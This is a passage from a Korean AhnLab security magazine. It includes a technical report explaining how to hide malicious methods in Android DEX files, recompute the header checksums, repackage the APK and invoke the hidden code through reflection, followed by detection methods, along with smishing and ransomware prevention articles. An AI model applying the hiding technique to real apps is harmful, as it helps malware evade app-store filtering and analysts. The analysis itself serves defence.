기를 통한 변조를 시도하는 악성코드도 발견된 바 있다. 이와는 또 다
른 유형의 인터넷 뱅킹 정보 탈취 악성코드인 DNS 변조형 뱅키는 자
기 자신이 DNS 서버 기능을 수행하며 공격 대상이 되는 사이트에 대
해서는 공격자의 서버로 접속이 이루어지게 하고, 그 외 사이트에 대
해서는 구글의 DNS를 사용하여 인터넷 사용이 가능하도록 하는 방
식을 사용하였다.
이러한 유형의 악성코드와 관련하여 안랩에서는 새롭게 발견되고 있
는 악성코드 유포지, 공격자 서버와 악성코드 샘플에 대해 가능한 빠
른 조치를 취하고 있으며, 관련 악성코드는 V3 제품군에서 다음과 같
은 진단명으로 진단하고 있다.
Trojan/Win32.Agent
Trojan/Win32.Banki
Trojan/Win32.Packed
Trojan/Win32.Small
Trojan/Win32.StartPage
사용자는 시스템 보호를 위해서는 보안 제품의 엔진을 항상 최신 버
전으로 업데이트 하는 것이 필수이며, 만약 해당 유형의 악성코드에
이미 감염된 이력이 있다면, 사용자의 공인인증서가 유출되었을 가능
성이 있으므로 새로운 공인인증서를 발급 받는 것이 바람직하다.
이 중 하나의 은행 사이트를 선택하여 접속하게 되면, 실제 은행 사이
트와 겉모습은 동일해 보이지만 실제로는 공격자가 구성한 가짜 은행
페이지로 접속이 이루어지며, 이때 인터넷 익스플로러의 주소창을 주
의 깊게 보면 [www.은행주소.com]이 아닌 [www.은행주소.com.r]
이라는 주소로 연결됨을 확인할 수 있다.
이후 은행 업무 관련 메뉴를 클릭하면 개인/기업 인증이 필요하다는
메시지와 함께 이름, 주민번호, 계좌번호, 계좌 비밀번호, 휴대전화번
호, 인증서 비밀번호, 보안카드 번호 등의 정보 입력을 요구하는 페이
지로 연결된다.
[그림 16] 변종에 따라 서로 다른 공격 대상 은행 목록
[그림 17] 사용자 정보 요구 페이지
2020
DEX 코드 은닉 기법 집중 분석
T E C h R E p O R T
악성 앱, 아는 만큼 막을 수 있다!
Dalvik Executable
언제 어디서나 커뮤니케이션이 가능한 모바일 기기는 이용자들에게 점점 매력적인 디바이스가 되고 있다. 이는 해커들에게도 마찬가
지이다. 해커들은 악성 앱을 이용해 각종 개인정보와 금융 정보를 담고 있는 모바일 기기를 향한 거센 공격을 준비하고 있다. 최근에
발생하는 대부분의 악성 앱을 이용한 공격은 앱 리패키징을 통해 기존 소스코드에 악의적인 코드를 은닉하여 악성 앱이나 위장 앱을
만드는 것이다.
이 글에서는 안드로이드 달빅 실행파일(Dalvik Executable 이하, DEX)에서 코드를 은닉할 수 있는 기법과 동작 원리에 대해 설명한
다. 또한 공격자가 이 기법을 악용해 악성코드를 제작할 경우 분석 실무자와 보안제품이 이에 대응할 수 있는 방안, 다시 말해 은닉 코
드를 탐지할 수 있는 방법에 대해서 자세히 소개하고자 한다.
DEX 파일의 구성
DEX 파일은 안드로이드 애플리케이션의 심장이라고 할 수 있다.
DEX 파일은 자바 바이트코드와 유사한 달빅 바이트코드를 사용하여
컴파일된 애플리케이션의 클래스에 대한 정보를 갖고 있다. DEX 파
일의 구성은 공식적으로 안드로이드 레퍼런스에 명문화되어 있으며,
[그림 1]과 같다.
● 데이터 섹션 – 코드 명령, 문자열, 필드, 디버그 정보 등을 갖는다.
DEX 파일의 가장 핵심적인 부분이라 할 수 있다. 이와 비교해 다른
섹션은 데이터를 전혀 갖고 있지 않고 오로지 데이터에 대한 오프셋
정보만 갖기 때문이다.
각 클래스는 클래스에 속한 필드와 메소드에 대한 정보를 가지고 있
는 데이터 섹션의 class_data_item 구조체로써 기술된다. 클래스에
속한 전체 메소드는 다이렉트 메소드(direct method)와 버추얼 메
소드(virtual method)의 두 가지 배열로 정의되는데, 각 메소드는
class_data_item의 encoded_method 구조체를 통해 선언된다. 구
조체의 내용은 다음과 같다.
● method_idx_diff – 이 값은 안드로이드 레퍼런스에 다음과 같
이 정의된다. “이름과 기술자를 포함해 메소드를 식별하기 위한
method_ids의 인덱스 목록의 이전 요소의 인덱스로부터의 오프셋
을 표현한다. 목록의 첫 번째 요소는 인덱스가 직접적으로 표현된다.”
간단히 말해 이 값은 method_ids의 인덱스에 대한 증분값이다. 만
약 이전 메소드의 메소드 인덱스가 3이고 현재 메소드의 method_
idx_diff가 1이라면 현재 메소드의 메소드 인덱스는 3 + 1 = 4가 된다.
● 접근 플래그(access_flags) – 공용 접근에 대하여 ACC_PUBLIC =
0x1 값을 갖는다. ACC_PRIVATE, ACC_PROTECTED, ACC_STATIC,
ACC_FINAL 등이 있다.
● 코드 오프셋(code_off) – 파일의 시작 위치로부터의 오프셋, 메소
드의 코드 위치를 나타낸다.
정상적인 DEX 파일에서 메소드가 선언되는 방법을 [그림 2]를 통해
더 살펴보자. 메소드 A는 메소드 목록에서 첫 번째로 선언된 메소드
● 헤더 – 파일 해시, 체크섬, 파일을 분석하기 위한 크기, 오프셋 정
보 등을 갖는다.
● 배열들 – 문자열 식별자, 타입 식별자, 프로토타입 식별자, 필드
식별자, 메소드 식별자, 클래스 정의와 관련된 배열이 있다. 배열에
기록된 값은 대체로 데이터 섹션에 존재하는 관련 데이터에 대한 오
프셋이다.
[그림1] 달빅 실행파일의 구성
21
이다. 때문에 메소드 A의 method_idx_diff는 직접적으로 메소드 인
덱스(method_idx)를 나타낸다. 코드 오프셋은 메소드 A의 코드 위
치를 잘 가리키고 있다.
DEX 코드 은닉 기법
지금까지 DEX 파일의 구성에 있어 핵심적인 내용을 위주로 특히, 메
소드의 선언에 대하여 자세하게 살펴봤다. 이제 본격적으로 DEX 파
일에서 코드를 은닉하는 기법을 다뤄보려 한다. 본격적인 설명에 들
어가기 전에, 왜 앞서 메소드 선언에 대해서 자세히 살펴봤는지 궁금
한 이가 있을 것이다. 이유는 DEX 파일에서 코드를 가질 수 있는 부
분이 메소드뿐이기 때문이다. 때문에 DEX 파일에서 코드를 은닉한다
는 것은 메소스를 은닉하는 것과 동의어가 된다. 따라서 앞으로 임의
의 클래스의 메소드를 은닉하는 기법을 살펴볼 것이다.
DEX 코드 은닉 기법은 몇 가지 서로 다른 방법이 존재하지만, 어떠한
경우에도 다음의 세 가지 단계를 공통적으로 거쳐야만 한다.
● DEX 파일에서 encoded_method로 기술되어 있는 메소드의 선
언을 조작한다. 다시 말해 은닉할 메소드의 선언을 수정하여 이미 존
재하는 다른 메소드를 가리키도록 만든다.
● DEX 파일을 재계산한다. DEX 파일은 파일의 유효성을 확인하기
위한 값을 파일의 앞부분에 들고 있다. 은닉 기법은 파일의 내용을 변
경하는 작업이므로, 파일의 유효성을 확인하기 위해 사용되는 SHA-1
해시와 아들러(adler32) 체크섬을 다시 계산하여 파일 헤더에 유효한
값을 기록해줘야 한다.
● 악의적으로 조작된 DEX 파일을 사용해 APK를 리빌드한다. 리빌
드 방법은 뒷부분에서 자세히 소개한다.
실제로 메소드의 선언을 조작하여 메소드를 은닉하는 구체적인 방법
을 살펴보자. 총 두 가지 기법을 소개할 것이다.
첫 번째 기법은 은닉된 메소드의 이전 메소드가 두 번 참조되게 하는
방법이다. [그림 5]가 이를 간략하게 예시하고 있으며 실질적인 내용
은 다음과 같다.
이 상태에서 메소드 B가 메소드 목록에 추가되면, 메소드 B의 메소
드 인덱스는 이전 메소드인 메소드 A의 메소드 인덱스와 메소드 B의
method_idx_diff를 더한 값으로 계산할 수 있다. 메소드 B의 코드
오프셋은 메소드 A와 다른 개별 위치를 가리키고 있다.
마지막으로 메소드 목록에 다시 메소드 C가 추가 되면, 메소드 C는
이전 메소드인 메소드 B의 메소드 인덱스와 메소드 C의 method_
idx_diff를 더한 값을 메소드 인덱스로 갖는다. 코드 오프셋은 메소드
A, B와는 다른 개별 위치를 가리키고 있다.
[그림 5]에서 빨간색 선은 메소드 B를 은닉하는 기법을 나타낸다. 메
소드 A의 메소드 인덱스와 코드가 모두 두 번 참조되고 있으며, 실제
메소드 B의 코드는 어디에서도 참조되지 않고, 즉 은닉되었다.
[그림 2] 정상 DEX 파일의 class_data_item 구조체, 메소드 A 선언
[그림 3] 정상 DEX 파일의 class_data_item 구조체, 메소드 A, B 선언
[그림 5] DEX 파일에서 메소드 은닉하기
[그림 4] 정상 DEX 파일의 class_data_item 구조체, 메소드 A, B, C 선언
22
● 은닉할 메소드의 method_diff_idx를 0으로 변경한다. 참고로 [그
림5]에서 은닉할 메소드는 메소드 B로 표현되고 있다. 이렇게 하면
달빅 유효성 검증기가 DEX 파일을 검증할 때 이름이나 디스크립터
등을 모두 포함하여 은닉 메소드를 이전 메소드와 완전히 동일한 메
소드로 잘못 인식하게 된다.
● 액세스 플래그(access flag)는 굳이 수정할 필요가 없다. 사실 수정
이 가능하지만 여기에서 다루지 않는다.
● 은닉할 메소드의 코드 오프셋을 이전 메소드의 코드 오프셋과 동
일한 값으로 설정한다. 당연한 얘기지만, 잘못된 코드 오프셋을 설정
하면 달빅 유효성 검증기가 오류를 발생시킬 수 있다.
DEX 파일에서 메소드들은 반드시 서로 연속적인 형태로 존재하도록
선언되어야만 한다. 이 원칙을 깨지 않기 위해서 은닉 메소드를 뒤따
르는 다음 메소드의 선언 또한 변경되어야 한다. 즉 다음 메소드의 메
소드 인덱스가 은닉 메소드가 마치 존재하지 않는 것처럼 잘못 계산
되도록 다음 메소드의 method_idx_diff 값을 크게 증가시킨다. 이렇
게 하면 결국 은닉 메소드가 이전 메소드와 완벽히 동일한 참조를 갖
게 되는 동시에 DEX 파일 규약에도 완벽히 부합하게 된다.
[그림 6]을 통해 첫 번째 기법을 다시 살펴보자. 은닉된 메소드 B가
메소드 A와 동일한 메소드 인덱스와 코드를 참조하고 있다. 메소드 B
가 메소드 A와 동일한 것으로 잘못 인식되게 함으로써, 결국 메소드
B의 실재 코드가 일반적인 방법으로는 참조될 수 없도록 은닉되었다.
두 번째 기법은 은닉된 메소드의 다음 메소드가 두 번 참조하는 방법
이다. 첫 번째 기법과 개념이 거의 동일하므로 간략히 설명한다. 이번
에는 은닉할 메소드의 메소드 인덱스가 다음 메소드의 메소드 인덱스
와 동일하게 잘못 계산되도록 method_idx_diff 값을 크게 증가시킨
다. 코드 오프셋도 다음 메소드와 동일한 코드를 참조하도록 다음 메
소드의 코드 오프셋 값으로 설정한다. 그리고 끝으로 다음 메소드의
method_idx_diff를 0으로 설정하게 되면, 은닉 메소드가 다음 메소
드와 완벽히 동일한 참조를 갖게 된다.
[그림 7]을 통해 두 번째 기법을 다시 살펴보자. 은닉된 메소드 B가
다음 메소드인 메소드 C와 동일한 메소드 인덱스와 코드를 참조하고
있다. 메소드 B가 메소드 C와 동일한 것으로 잘못 인식시킴으로써 이
기법에서도 결국 메소드 B의 실재 코드가 일반적인 방법으로는 참조
될 수 없도록 은닉되었다.
한가지만 덧붙이자면, 두 기법 모두 조작된 클래스는 여전히 은닉 메
소드에 대한 정보를 포함하고 있으며 단지 은닉하고 있는 형태라는 것
에 주의해야 한다. 즉 클래스의 메소드 개수를 절대 변경하면 안 된다.
유효한 DEX 파일 빌드
앞의 단계에서 DEX 파일의 내용을 변경했으므로 파일의 유효성을 계
속 보장하려면, DEX 파일의 헤더를 반드시 수정해야 한다. 수정해야
하는 부분은 헤더에서도 맨 앞에 위치한다. 이 중 처음 값은 DEX 매
직 값으로, 절대로 다른 값으로 수정해선 안 된다. 다음으로 아들러
(adler32) 체크섬 그리고 SHA-1 해시 두 가지 필드가 따르게 되는데,
이 두 값을 올바른 값으로 변경시켜야 한다. 잘 알려진 바와 같이 체
크섬은 전송이나 저장 시 오류를 검출하기 위해 사용되며, 해시는 무
결성을 검증하기 위해 사용된다. 두 필드의 값은 모두 DEX 파일의 나
머지 부분에 대해 계산된 값이다. SHA-1 해시는 DEX 매직, 체크섬
과 자신을 제외한 전체 파일에 대해 계산한 값이고, 아들러 체크섬은
DEX 매직과 자신을 제외한 전체 파일에 대해 계산한 값이다. 그러므
로 다음 순서에 맞게 두 값을 차례로 계산해야 유효한 DEX 파일을
빌드할 수 있다.
● DEX 파일의 SHA-1을 계산하여 헤더에 기록한다.
● DEX 파일의 아들러 체크섬을 계산하여 헤더에 기록한다. 아들러
체크섬 계산은 앞서 기록한 SHA-1을 포함하므로 순서에 주의한다.
이 두 단계를 마치면 DEX 파일은 유효성을 갖게 된다. 다음은 위 과
정의 코드 구현의 예이다.[그림 6] 이전 메소드 두 번 참조 기법
[그림 8] 유효한 DEX 파일 코드 구현의 예
[그림 7] 다음 메소드 두 번 참조 기법
23
APK 파일 리빌드
앞선 과정을 통해 DEX 파일에 대한 준비가 모두 끝났으므로, 안드로
이드 애플리케션(.apk)을 리패키징한다. 이 과정은 명령행으로 안드
로이드 애플리케이션을 빌드해 본 경험이 있는 사람에게는 전혀 어렵
지 않을 것이다. 이클립스를 전용으로 사용하는 개발자에게 다소 생
소할 수도 있겠으나 절차는 꽤 간단하다.
● 원본 APK 파일의 압축을 해제한다.
● 해제한 원본 파일들과 조작된 DEX 파일(classes.dex)을 Zip으로
압축한다.
● Jarsigner와 개발자 키로 서명하여 새로운 APK 파일을 빌드한다.
이 과정은 메이크파일(Makefile)을 사용해 쉽게 자동화할 수 있다. 메
이크파일의 예는 다음과 같다.
● 언패치된 DEX 파일에서 getDeclaredMethods()를 이용하여 은
닉된 메소드를 탐색한다.
● 언패치된 DEX 파일로부터 생성한 오브젝트 인스턴스에서 은닉된
메소드를 호출한다.
다음은 위 과정의 코드 구현의 예이다.
DEX 은닉 코드 호출
은닉된 코드를 실행할 수 없다면 은닉 기법은 아무런 가치도 없다. 지
금부터 공격자가 악의적으로 조작한 은닉 코드를 애플리케이션 실행
시 임의로 실행할 수 있는 방법에 대해 설명한다.
● 현재 애플리케이션의 DEX 파일을 오픈해서 메모리상의 배
열에 적재한다. 이것은 android.content.res.AssetManager의
openNonAsset 메소드를 사용한다. 이 메소드는 자산이 아닌 파일
들을 자산으로서 열어준다. 하지만 이 메소드는 직접 접근하여 호출
할 수 없는 함수이기 때문에 자바 리플렉션 기법을 사용한다.
● 메모리상의 DEX 파일이 적재된 배열을 언패치한다. 말 그대로 코
드를 은닉하기 위해 했던 절차를 거꾸로 적용하는 것이다. 조작했던
값을 원본 값으로 모두 되돌린다.
● 언패치된 메모리상의 DEX 파일을 새 클래스로써 오픈한다. 이
것은 메모리상의 DEX 파일에 대해 자바 리플렉션 기법을 사용해
openDexFile()을 호출하면 된다. 이 메소드는 쿠키(cookie)를 반환
하게 되는데, 실제 이 쿠키의 값은 DEX 파일의 내부 데이터 구조체에
대한 포인터이다. 그리고 defineClass()를 사용하여 언패치된 클래스
를 로드한다. 이 메소드는 클래스를 로드하기 위해 openDexFile()이
반환한 쿠키를 이용한다.
DEX 은닉 코드 탐지
DEX 코드 은닉 기법은 다양한 분야에 활용될 수 있다. 예를 들어, 앱
마켓 플레이스의 필터링을 우회하는 데 이용될 수 있다. 또한 역분석
을 어렵게 하기 위한 안티-리버싱 기법으로 활용될 수도 있다. 더욱
이 악성코드 제작자가 악성 앱 제작 시 악의적인 코드를 은닉하기 위
하여 본 기법을 악용할 수 있다. 따라서 지금부터 은닉 코드 탐지에
활용할 수 있는 탐지 방법 몇 가지를 소개한다.
● encodeded_method에서 method_idx_diff가 0이나 0보다 작
은 값을 갖는 경우 혹은 method_idx_diff로 계산한 method_idx가
중복 사용된 경우
[그림 9] APK 파일 리빌드 메이크파일 예
[그림 11] 은닉 코드 탐지 구현의 예: method_idx_diff가 <=0 또는 methdod_idx 중복 사용
[그림 10] DEX 은닉 코드 호출 구현의 예
24
● encodeded_method에서 code_off가 중복 사용된 경우
● method_ids의 인덱스 중에서 사용되지 않은 method_idx 추출
지금까지 안드로이드에서 DEX 파일의 유효성 검증 시 암호화된 메소
드(encoded_method)를 완벽하게 검증하지 못하는 취약점을 이용,
임의의 코드를 은닉하고 또 실행할 수 있는 공격 방법에 대해 살펴봤
다. 은닉된 코드는 DEX 파일에 그대로 남아 있었으며 일반적인 분석
도구나 분석가에게 보이지 않게 되었다. 그러나 다행히도 DEX 코드
은닉 기법을 탐지하는 것 또한 가능하였다.
[그림 12] 은닉 코드 탐지 구현의 예: code_off 중복 사용
[그림 13] 은닉 코드 탐지 구현의 예: 사용되지 않은 method_idx 추출
2525
i T & L i f E
사용하면 편리한 윈도 단축키 9가지
단축키라고 하면 복사하기(Ctrl + C), 붙여넣기(Ctrl + V), 저장하기(Ctrl + S) 정도로 알고 있는 대부분의 PC 사용자들. 수많은 단축키
를 외우기란 쉽지 않다. 하지만 몇 가지 유용한 키를 외워두고 손에 익히면 오히려 마우스보다 편리할 때도 있다. 윈도7에서 유용한 단
축키 몇 가지를 소개한다.
작업 관리자 창 열기 : Ctrl + Shift + Esc
PC가 느려지고 작동에 문제가 생겼을 때 작업 관리자 창을 띄운다. 보통은 재부팅을 위해 Ctrl + Alt + Del(또는 Delete)을 누르지만, 작업 관리
자 창을 열어 응답 없는 프로그램을 종료하기 위해 이 키를 이용하는 사람들도 있다. PC가 멈춰서 답답하고, 작업 관리자 창도 바로 열리지 않
아 더 답답하다. 몇 번을 손가락에 힘을 주어 누르면 그제서야 여러 가지 메뉴(이 컴퓨터 잠그기, 사용자 전환, 로그 오프, 암호변경, 작업 관리
자 시작)를 사용할 수 있는 관리자 창이 뜬다. 하지만 이제부터는 손가락에 힘을 줄 필요가 없다. 왼쪽 손가락만으로 Ctrl + Shift + Esc를 누를
수 있고 Ctrl + Alt + Del(또는 Delete)을 눌렀을 때 보다 작업 관리자 창이 빨리 뜬다.
사용 중인 창만 남기고 모든 창 최소화하기 : Win + Home
PC를 사용하다 보면 창을 여러 개 띄워놓을 때가 있다. 이 창 저 창 열었다, 닫았다 혼란스럽고 정신까지 없다. 이럴 땐 Win + Home을 눌러주
자. 사용 중인 창만 남기고 모든 창이 최소화된다. 물론 최소화됐으므로 저장이 안 되지 않을까 불안해 하지 않아도 된다.
모든 창 최소화 : Win + M, 최소화된 창 다시 열기 : Win + Shift + M
간혹 업무 중 지루함을 달래거나 졸음을 쫓기 위해 인터넷 검색을 하거나 뉴스를 볼 때가 있다. 업무와 상관 없는 연예, 스포츠, 시사 관련 뉴스
를 보는 도중 상사가 지나간다면? 이럴 땐 스피드가 필요하다. Win + M을 눌러 모든 창을 최소화하자. 마우스로 움직이는 것보다 신속하며 즉
각 반응한다. 보다가 중단했던 뉴스를 다시 보려면 Win + Shift + M을 사용하자.
검색하기 : Win 또는 Win + F
윈도를 사용하다 보면 자주는 아니지만 프로그램이나 파일 등을 검색할 일이 생긴다. Win 키 하나만 눌러줘도 되지만 Win + F를 눌러줘도 된
다. 물론 뜨는 창은 각각 다르다.
새 폴더 만들기 : Ctrl + Shift + N
새 폴더를 만들 때는 마우스 클릭이 더 편할 수도 있고, 단축키에 익숙한 사람은 단축키가 더 편할 수도 있다. 바탕화면에서 Ctrl + Shift + N을
누르면 새 폴더가 생성된다. 마우스의 오른쪽을 클릭해도 새 폴더를 만들 수 있다.
폴더 이름 바꾸기 : F2
새 폴더를 만든 후에는 폴더 이름을 정한다. 새 폴더인 상태라면 이름을 바꿀 필요는 없겠지만, 기존의 경우에는 폴더를 선택한 상태에서 F2를
누른다. 이땐 마우스로 클릭하는 것보다 단축키가 빠르고 편리하다.
새로운 창 열기 : Ctrl + N
윈도에서 인터넷 익스플로러, 아웃룩, 마이크로소프트 오피스, 메모장 등을 사용하다 새로운 창을 열어 다른 작업을 할 때 유용한 단축키다. 열
려 있는 프로그램에서 Ctrl + N을 누르면 새로운 창이 뜬다.
사용중인 창 닫기 : Alt + F4
현재 작업 중이던 문서를 닫을 때 유용하다. Alt + F4를 누르면 문서를 저장할지 여부를 묻는다. 사용자가 저장을 선택하면 저장 후 창이 닫힌
다. 굳이 저장하고 창을 닫을 필요 없이 문서 작업 후에는 이 단축키를 사용하면 편하다.
시스템 잠금 : Win + L
자리를 비울 때 유용한 단축키다. Win + L은 누르기가 무섭게 재빨리 시스템 잠금 화면으로 전환된다. 비밀번호를 걸어 두었다면 누군가 내 자
리에서 인터넷을 하고 싶어도 할 수 없다. 물론 비밀번호는 다른 사람이 유추할 수 없도록 길고 복잡하게 설정해두자.
2626
i T & L i f E
실제 피해 사례로 살펴본 최신 스미싱과 예방법
명절 전후는 악성코드 제작자에게 더 없이 좋은 기회다. 택배 업체를 가장한 스미싱(smishing)이 있기 때문이다. 문제는 스미싱 피해
가 기존과는 차이가 있다는 점이다. 모바일 메신저에서 타인을 사칭해 금전을 요구하는가 하면 스마트폰 원격제어를 통해 통제 불가능
하게 만든다. 이에 실제 스미싱 피해 사례를 통해 피해 예방법과 피해 발생 시 대처법을 소개한다.
직장인 A 씨는 최근 2건의 스미싱 문자를 받았다. 하나는 도로교통법 적발 문자였고, 다른 하나는 택배 업체를 사칭한 메시지였다. 한 번도 스미
싱 피해자가 될 것이라고는 생각지도 못했던 A씨가 스미싱 문자의 피해자가 됐다.
[그림 1]의 (좌), (우) 문자는 모두 스미싱이다. (좌)의 문자는 비운전자라면 스팸 문자로 생각하고 그냥 넘어가겠지만 운전자라면 속기 쉽다. A씨
는 도로교통법 적발 문자에 대해서는 자신이 비운전자이기 때문에 스팸 문자나 스미싱으로 생각했다. 그러나 문제의 발단은 두 번 째 문자메시
지였다.
온라인 쇼핑을 자주하는 A씨였기에 익숙한 번호였고 택배 업체의 문자 메시지라고 생각했다. 그러나 A 씨가 문자 메시지의 사실 확인을 위해
URL을 클릭하자 해당 택배 업체가 아닌 다른 택배 업체 사이트로 연결됐다. 당시에는 이상한 점을 인지하지 못한 A씨.
A씨가 피해를 인지했을 때는 친구를 만나고 나서다. 친구 B씨는 “같이 있는데 왜 자꾸 메시지를 보내느냐”고 말했고, 모바일 메신저에서 A씨가
지인들에게 돈을 빌려달라고 했다는 사실도 알려 주었다. A씨를 사칭해 돈을 요구한 사람은 B씨 뿐만이 아니었다. SNS(소셜 네트워크 서비스)
의 쪽지로도 “돈이 필요하다고 했는데 네가 맞냐”며 캡처한 화면도 A 씨에게 보여 주었다. A씨의 여러 명의 지인들이 금전 요구 메시지를 받았
다는 것도 알게 됐다. 이런 수법이 과거 메신저에서 이용된 적이 있어 지인이 피싱을 의심하거나 바로 송금해주겠다고 답변하지 않으면 A씨를
사칭한 이는 온갖 욕설까지 퍼붓기도 했다. 자칫 A 씨의 인간관계에 큰 문제가 생길 뻔했다. 뭔가 이상하다고 생각한 A씨는 택배 문자메시지가
걸렸다. 아차, 스미싱 문자의 URL을 의심 없이 클릭했던 것이 화근이었다. 나중에 문제가 된 문자메시지를 찾아 URL을 클릭했지만 연결되지 않
는 페이지로 바뀌었다.
[그림 1] 도로교통법 적발을 가장한 스미싱(좌)/ 택배 업체를 사칭한 스미싱(우)
[그림 2] A 씨를 사칭해 모바일 메신저로 금전을 요구한 화면
A씨는 지인들에게 자신의 모바일 메신저가 도용 당했음을 알리기 위해 로그인을 시도했지만 인증 오류 메시지가 뜨면서 로그인이 되지 않았다.
게다가 몇몇 지인은 평소와 다른 A 씨가 수상하다고 여기고 A씨에게 확인 전화를 시도했지만 통화 불가능이었다. 그러던 중 A 씨는 스팸 전화
알림 메시지를 받고 나서야 휴대전화기의 착신에 문제가 있다는 것을 알았다. A씨의 스마트폰이 원격 제어되고 있었던 것이다. 공격자는 A씨의
전화 통화를 방해하기 위해 ‘수신 전화 차단’으로 변경했다. A 씨의 전화 수신을 막기 위해 벨소리도 무음 상태로 해두었던 것이다.
27
이처럼 공격자가 제어권을 갖게 되면 스마트폰에 저장된 개인정보는 물론 직접 금융 거래까지 가능할 수 있어 심각한 문제를 일으킬 수 있다는
점에서 위험하며 모바일 메신저처럼 타인 사칭도 우려된다.
박시준 ASEC분석팀 선임연구원은 “스마트폰의 경우 개인정보는 물론 이메일, 문자, 주소록의 관계 정보 등 사생활 정보가 그대로 저장돼 있어
마음만 먹으면 직접 확인할 수 있다. 이런 점에서 공격자가 피해자의 스마트폰의 제어권을 갖게 된다면 이런 관계를 파악해 보다 정밀한 사회공
학적 기법으로 접근해 공격의 성공률을 높일 수 있다. 또한 피해자에게 직접 확인하는 보편적인 방법인 전화 연결 또한 차단할 수 있다는 점에
서 그 성공률은 더욱 높아질 가능성이 충분하다”고 분석했다.
그는 또 “스마트폰을 분실하거나, 제어권을 빼앗긴 것은 단순히 단말기 분실에서 그치는 것이 아니라 그 사람의 가상 세계의 권리까지 잃어버리
거나 빼앗기는 결과가 될 수 있어 각별한 주의가 필요하다”고 조언했다.
따라서 스미싱 피해를 예방하려면 발신자와 발신 전화번호가 일치하더라도 출처가 확인되지 않은 URL은 클릭하지 않는 것이 안전하다. 클릭을
해야 한다면 클릭 전에 해당 업체의 전화번호를 확인한 후 발신자에게 전화를 걸어 URL이 안전한지 확인해야 한다.
또 스미싱을 통해 대부분의 악성 앱이 설치되는 만큼 확인되지 않은 앱이 설치되지 않도록 스마트폰의 보안 설정을 강화하는 것도 중요하다.
[환경설정] → [보안] → [디바이스 관리] → ‘알 수 없는 출처’에 체크돼 있다면 해제한다.
만약 스미싱 문자를 클릭했다면 신속한 대처로 추가 피해를 예방하자. 먼저 가입된 이동통신사의 고객센터에 전화하거나 홈페이지를 이용해 소액
결제를 차단하거나 결제금액을 제한한다. 또는 이동통신사 고객센터(국번없이 114)에 전화를 걸어 상담원에게 소액결제 차단을 요청해도 된다.
금전 피해가 발생하지 않았다면 스마트폰에 설치된 악성파일을 삭제하고 가입된 이동통신사가 제공하는 예방서비스를 이용한다.
스미싱 차단 앱은 반드시 설치하고 주기적으로 업데이트하자. 그리고 앱은 통신사나 앱스토어 등 공인된 오픈마켓을 통해 설치하며 탈옥은 절대
하지 말고 보안강화나 업데이트 명목으로 금융 정보를 요구하는 경우 절대 입력하지 말아야 한다.
한편 안랩의 안티스미싱 솔루션 “안전한 문자”는 이번 택배 관련 스미싱 문자를 탐지해 사용자들의 피해를 예방한 바 있다.
피해 구제 방법
• 금융기관 콜센터에 전화한다.
• 경찰서에서 발급받은 ‘사건사고 사실확인원’을 이동통신사, 게임사, 결제대행사 등 관련 사업자에게 제출한다.
악성파일 삭제 방법
스마트폰 내 ‘다운로드’ 앱 실행 → 문자를 클릭한 시점 이후 확장자명이 apk인 파일이 저장됐는지 확인하고 해당 apk 파일을 삭제한다. 삭
제되지 않으면 단말기 서비스센터를 방문하거나 스마트폰을 초기화한다.
<출처 : 사이버 경찰청>
28
a h N L a b N E w S
28
안랩은 지난달 10일 판교 안랩 사옥에서 사이버 위협 인텔리전스 강
화를 위한 민∙관 협동 보안 실무 2차 회의를 진행했다.
이번 회의는 한국인터넷진흥원(KISA, 이하 KISA, 원장 백기승)과 국
내 보안 업체 실무자 간 선제적 침해사고 대응 공조 체계를 강화하
기 위한 것으로 지난 1월에 이어 두 번째로 개최됐다.
KISA를 비롯해 빛스캔, 안랩, 이스트소프트, 잉카, 하우리, NSHC(이
상 가나다순) 등 민∙관 보안전문가가 모인 이번 회의에서는 ▲최근
사이버 위협 동향 ▲주요 악성코드 및 취약점 동향 ▲지속 가능한
사이버 위협 인텔리전스 협력 강화 방안 등이 논의됐다.
정현철 KISA 침해사고분석단장은 “한국인터넷진흥원은 보안 위협이
점점 고도화됨에 따라, 민간 업체와 사이버 위협 및 분석 정보를 공
유하는 등 유기적인 연계와 대응 공조를 강화해 왔다”며 “앞으로도
민∙관의 긴밀한 협력으로 국가적 사이버위협 선제대응에 나설 것”이
라고 말했다.
한편, KISA는 향후에도 국내 보안 업체와 관련 실무 회의를 정기적
으로 이어갈 예정이다.
나면 다시 속성을 읽기전용으로 바꾸어 보관하는 것이다.
PC 못지 않게 ‘심플로커’와 같이 안드로이드 기반의 스마트폰내 정
보를 ‘인질’로 잡고, 금전을 요구하는 스마트폰 랜섬웨어도 자주 발
견되고 있다. 따라서 스마트폰 사용자는 공식 마켓 외에는 앱 다운로
드를 자제하고 “알 수 없는 출처[소스]”의 허용 금지를 설정하는 것
이 좋다. 공식 마켓에도 악성 앱이 업로드되는 경우가 있으므로 앱
다운로드 전 평판정보를 확인해야 한다.
또한, 해당 앱은 스미싱을 통해서도 전파될 수 있으므로, 문자 메시
지나 SNS(Social Networking Service) 등에 포함된 URL 실행을 자
제하고, 모바일 전용 보안 앱이나 스미싱 탐지 앱 등을 설치 및 실행
하는 것이 좋다. 랜섬웨어에 감염되면 스마트폰을 안전모드(단말기
제조사 별로 상이)로 부팅한 후 [설정]→[기기관리자(휴대폰 관리자)]
메뉴에서 랜섬웨어를 포함하고 있는 악성 앱의 비활성화에 체크한
다. 이후 애플리케이션 목록에서 해당 앱을 제거한다.
사이버위협 대응 위한
민·관 보안실무 2차회의 개최
안랩, ‘랜섬웨어 피해 예방 3대 수칙’ 제시
안랩은 랜섬웨어(Ransomware)의 피해 예방을 위한 PC 사용자와
스마트폰 사용자의 ‘랜섬웨어 피해예방 3대 수칙’을 제시하고 사용
자들의 주의를 당부했다.
최근 보고된 랜섬웨어는 대부분 스팸 메일을 통해 확산되고 있다. 따
라서 출처가 불분명하거나 분명한 출처의 이메일이라도 스팸성으로
의심되면 메일이나 첨부파일의 실행을 자제하고 삭제해야 한다. 또
한 자신이 사용하는 OS별 방법에 따라 업무 및 기밀문서 등의 주요
파일을 백업하고, 백업한 파일은 PC 저장 장치 외에 외부저장 장치
에 별도로 저장하는 것이 안전하다.
중요한 문서는 ‘읽기전용’으로 설정하는 것도 피해 예방에 도움이 된
다. 대부분의 랜섬웨어는 파일을 수정하면서 암호화를 시도하기 때
문에 중요 파일을 수정하거나 편집한 후에는 읽기전용으로 속성을
변경하면 일부 랜섬웨어에 의한 파일 수정(암호화)을 막을 수 있다.
즉, 중요도가 매우 높은 문서의 속성을 읽기전용으로 설정하여 보관
하다가 수정이 필요하면 해당 속성을 해제한 후 수정하고, 수정이 끝
29
보안 통계와 이슈 S T a T i S T i C S
악성코드 탐지 건수 1,000만 여건 증가
